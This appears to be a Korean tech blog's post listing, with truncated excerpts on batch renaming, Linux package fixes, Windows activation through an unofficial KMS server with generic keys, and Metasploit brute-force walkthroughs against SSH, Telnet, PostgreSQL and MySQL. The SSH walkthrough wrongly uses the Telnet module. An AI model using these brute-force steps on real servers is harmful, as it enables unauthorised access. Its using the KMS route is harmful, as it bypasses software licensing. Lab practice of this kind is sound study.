윈도우 파일명 일괄 수정하기- 파일명 순서대로 숫자 부여하기 1. 파일들을 한 폴더 안에 모두 넣기 2. 아래의 소스코드를 .bat 파일로 저장하기 - 코드 내 jpg 대신 바꿀 파일들의 확장자명을 넣으면 된다.@echo off setlocal setlocal EnableDelayedExpansion for %%a in (*.jpg) do ( set f=%%a set f=!f:^(=! set f=!f:^)=! ren "%%a" "!f!" ) 3. 폴더 내에서 Ctrl + A 를 눌러 전체 선택 후 F2를 눌러 이름을 바꾼다. 4. 아까 저장한 .bat 파일을 실행한다. 5. 만약 위 과정까지 거쳤으나 공백을 없애고 싶다면 해당 폴더에서 Shift + 우클릭을 통해 PowerShell 창을 연다. 6. 열..
Windows 설치 후 정품인증 방법 CMD 창을 관리자 권한으로 실행한다. CMD 창에서 아래 명령어를 한 줄씩 실행한다. 첫 번째 명령어인 /ipk 의 경우 아래 버전별 값을 확인하여 입력을 넣어야 한다. - slmgr /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX - slmgr /skms kms8.msguides.com - slmgr /ato /ipk 명령어의 경우 사용하는 버전마다 다르니 확인 후 입력 권장 1) Pro 버전 ▶ slmgr /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX 2) Pro N 버전 ▶ slmgr /ipk MH37W-N47XK-V7XM9-C7227-GCQG9 3) Enterprise 버전 ▶ slmgr /ipk NPPR9-FWDCX-D2C8J..
상황 hping 명령어를 사용하려고 했더니 아래와 같은 에러가 출력되었다. > hping -1 [ping 보낼 IP] bash: hping: command not found... Similar command is: 'ping' 해당 명령어를 찾을 수 없다며 ping 명령어와 유사하다고 뜨지만, hping을 사용할 계획이었으므로 해결방안을 찾았다. 해결방안 아래 명령어로 hping을 재설치하였더니 해결되었다. > dnf install hping3
상황 - yum 명령어를 사용하여 설치를 진행하려고 했으나 아래와 같은 눈에 띄는 에러 문구들이 보였다. - there are no enabled repos - repolist all repolist: 0 - 해당 에러에 대해 알아보니 repolist에 아무것도 없어서 생기는 에러라고 한다. 해결방법 - 아래와 같은 방법으로 해결하였다. 1. cd /etc/yum // /etc/yum 디렉터리로 이동 2. ls // 디렉터리 목록 확인 이때 repos.d 디렉터리 유무를 확인하고, 존재하지 않는다면 mkdir repos.d 로 디렉터리를 생성한다. 3. cd repos.d // repos.d 디렉터리로 이동 4. vi daum.repo // daum.repo 파일 생성(내용은 아래와 같다.) [base]..
Metasploit을 활용해 Brute-Force 공격하기(SSH 서버) * SSH 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/telnet/telnet_login 2. 공격 대상의 PC로 Telnet 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. ssh 서버를 통해 id: root / pw : 1234 로 로그인이 성공한 것을 확인할 수 있다. 위에서 알아낸 계정으로 ssh..
Metasploit을 활용해 Brute-Force 공격하기(Telnet 서버) * Telnet 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/telnet/telnet_login 2. 공격 대상의 PC로 Telnet 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. telnet 서버를 통해 id: root / pw : 1234 로 로그인이 성공한 것을 확인할 수 있다. 위에서 알아낸..
Metasploit을 활용해 Brute-Force 공격하기(PostgreSQL 서버) * PostgreSQL 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/postgres/postgres_login 2. 공격 대상의 PC로 PostgreSQL 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set rport 5432 # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. postgressql 서버를 통해 id: postgres /..
Metasploit을 활용해 Brute-Force 공격하기(MySQL 서버) * MySQL 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/mysql/mysql_login 2. 공격 대상의 PC로 MySQL 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set rport 3306 # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. mysql 서버를 통해 id: root / pw : 1234로 로그인이 성공한 것을 확인할 수 있..